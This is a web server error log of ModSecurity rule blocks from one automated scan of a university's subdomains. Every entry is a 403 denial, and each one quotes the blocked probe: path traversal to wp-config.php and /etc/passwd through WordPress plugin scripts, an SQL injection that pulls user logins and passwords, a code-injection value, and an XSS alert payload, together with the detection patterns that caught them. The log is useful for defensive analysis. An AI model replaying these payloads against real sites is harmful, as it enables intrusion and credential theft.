[Tue Aug 29 11:48:02.409278 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAj12AQAAAAa"]
[Tue Aug 29 11:48:02.436764 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAkGCVoAAAAE"]
[Tue Aug 29 11:48:02.476774 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAkAL@cAAAAU"]
[Tue Aug 29 11:48:02.477792 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAjCbNkAAAAB"]
[Tue Aug 29 11:48:03.363419 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14g8Co-f0AAAkmThQAAAAF"]
[Tue Aug 29 11:48:03.366430 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAj12AkAAAAa"]
[Tue Aug 29 11:48:03.371577 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAi2yMkAAAAN"]
[Tue Aug 29 11:48:03.385238 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAkGCV4AAAAE"]
[Tue Aug 29 11:48:03.385655 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAj12AoAAAAa"]
[Tue Aug 29 11:48:03.392983 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAi2yMoAAAAN"]
[Tue Aug 29 11:48:03.437663 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14g8Co-f0AAAi2yMwAAAAN"]
[Tue Aug 29 11:48:04.375846 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hMCo-f0AAAjbw6kAAAAW"]
[Tue Aug 29 11:48:04.381100 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkNPsQAAAAI"]
[Tue Aug 29 11:48:04.424730 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkGCWkAAAAE"]
[Tue Aug 29 11:48:04.431095 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAjCbN8AAAAB"]
[Tue Aug 29 11:48:04.442430 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkNPscAAAAI"]
[Tue Aug 29 11:48:04.453026 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hMCo-f0AAAkaDBEAAAAJ"]
[Tue Aug 29 11:48:04.463877 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkGCWsAAAAE"]
[Tue Aug 29 11:48:05.360925 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAj12BgAAAAa"]
[Tue Aug 29 11:48:05.383381 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAjCbOIAAAAB"]
[Tue Aug 29 11:48:05.397685 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAkGCW0AAAAE"]
[Tue Aug 29 11:48:05.400119 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAj12BkAAAAa"]
[Tue Aug 29 11:48:05.402387 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAjtc6YAAAAX"]
[Tue Aug 29 11:48:05.431600 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkGCW4AAAAE"]
[Tue Aug 29 11:48:05.434483 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkksG4AAAAA"]
[Tue Aug 29 11:48:05.435994 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAklewUAAAAD"]
[Tue Aug 29 11:48:05.448915 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkaDBYAAAAJ"]
[Tue Aug 29 11:48:05.455946 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hcCo-f0AAAj12BsAAAAa"]
[Tue Aug 29 11:48:05.471851 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAkdu8MAAAAO"]
[Tue Aug 29 11:48:06.359929 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAj12BwAAAAa"]
[Tue Aug 29 11:48:06.362909 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAjy55gAAAAG"]
[Tue Aug 29 11:48:06.363786 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAjbw7MAAAAW"]
[Tue Aug 29 11:48:06.372445 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkksHEAAAAA"]
[Tue Aug 29 11:48:06.377534 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkdu8UAAAAO"]
[Tue Aug 29 11:48:06.384297 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkNPs8AAAAI"]
